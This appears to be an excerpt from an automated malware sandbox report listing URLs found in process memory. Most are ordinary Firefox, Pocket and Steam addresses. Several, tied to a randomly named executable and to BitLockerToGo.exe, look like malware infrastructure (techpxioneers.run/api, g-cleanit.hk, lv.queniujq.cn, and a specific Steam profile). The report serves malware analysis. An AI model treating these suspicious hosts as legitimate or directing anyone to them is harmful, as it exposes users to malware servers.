Source: firefox.exe, 00000022.00000002.3085550485.0000020F0FF9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045186093.0000020F08E5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000022.00000002.3045186093.0000020F08E5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/content-src/asrouter/docs/debuggin
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/nimbus-desktop-experiments
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
Source: firefox.exe, 00000022.00000002.3090183170.0000020F7786B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: BitLockerToGo.exe, 00000010.00000003.2938863985.0000000004949000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2939502975.00000000049F1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2942911026.000000000490D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2941510956.000000000490D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2944566017.0000000004BD1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2943786609.000000000495F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2942100476.0000000004948000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2942449191.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3057943910.0000000004A4E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3056907098.00000000049B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3057540760.0000000004C33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3058355136.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://g-cleanit.hk
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://getpocket.com/
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://getpocket.com/a4
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://getpocket.com/collections
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://getpocket.com/explore/
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://getpocket.com/read/$
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: powershell.exe, 0000002E.00000002.3381480619.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: firefox.exe, 00000022.00000002.3071975648.0000020F0B6B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000022.00000002.3071975648.0000020F0B6B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000022.00000002.3015140670.0000020F05650000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://github.com/projectfluent/fluent.js/wiki/React-Overlays.
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp, firefox.exe, 00000022.00000002.3073598187.0000020F0B716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000022.00000002.3108753623.00000B6D71F04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://help.getpocket.com/article/1142-firefox-new-tab-recommendations-faq
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 00000022.00000002.3090183170.0000020F77811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/7
Source: firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3085550485.0000020F0FF71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2986263656.0000020F0FF71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: firefox.exe, 00000022.00000002.3105196678.0000020F7FBA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: firefox.exe, 00000022.00000003.2855918268.0000020F778DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3090183170.0000020F778D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000022.00000002.3016825878.0000020F06317000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 00000022.00000002.3073598187.0000020F0B716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 00000022.00000002.3049576660.0000020F09B7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.3046778370.0000020F09875000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000022.00000002.3016825878.0000020F06317000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000022.00000002.3015140670.0000020F05650000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000022.00000002.3049576660.0000020F09B7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.3045677932.0000020F08F08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.3049576660.0000020F09B7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.3046778370.0000020F09875000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://snippets.mozilla.com/show/
Source: firefox.exe, 00000022.00000002.3074371464.0000020F0B8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2951927762.0000020F100EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000022.00000003.2994105881.0000020F08CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000022.00000002.3016825878.0000020F06317000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337768464.0000000000C94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/dM
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337768464.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 5a20b6327b.exe, 0000000B.00000003.2337768464.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamloopback.host
Source: 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
Source: 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 00000022.00000002.3016825878.0000020F06317000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 186adf2617.exe, 00000014.00000003.2852277490.0000000005F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000022.00000002.3065862518.0000020F0B048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: 186adf2617.exe, 00000014.00000003.2852277490.0000000005F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 5a20b6327b.exe, 0000000B.00000003.2455394872.0000000000D16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/
Source: 5a20b6327b.exe, 0000000B.00000002.2458755013.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2455394872.0000000000D16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/(
Source: 5a20b6327b.exe, 0000000B.00000003.2385182968.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/8
Source: 5a20b6327b.exe, 0000000B.00000003.2351715370.0000000000C94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/:
Source: 5a20b6327b.exe, 0000000B.00000002.2458755013.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2455394872.0000000000D16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/X
Source: 5a20b6327b.exe, 0000000B.00000003.2400766186.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000002.2458526282.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/api
Source: 5a20b6327b.exe, 0000000B.00000003.2371381746.0000000005640000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/api/
Source: 5a20b6327b.exe, 0000000B.00000002.2458781329.0000000000D22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/apiY
Source: 5a20b6327b.exe, 0000000B.00000002.2467671534.0000000005640000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/apir
Source: 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/n
Source: 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/na
Source: 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2352191035.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/rd
Source: 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run/t
Source: 5a20b6327b.exe, 0000000B.00000003.2337768464.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://techpxioneers.run:443/api
Source: firefox.exe, 00000022.00000002.3016825878.0000020F06317000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000022.00000002.3108753623.00000B6D71F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F063B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000022.00000002.3073598187.0000020F0B716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000022.00000002.3046778370.0000020F09875000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000022.00000002.3046778370.0000020F09875000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
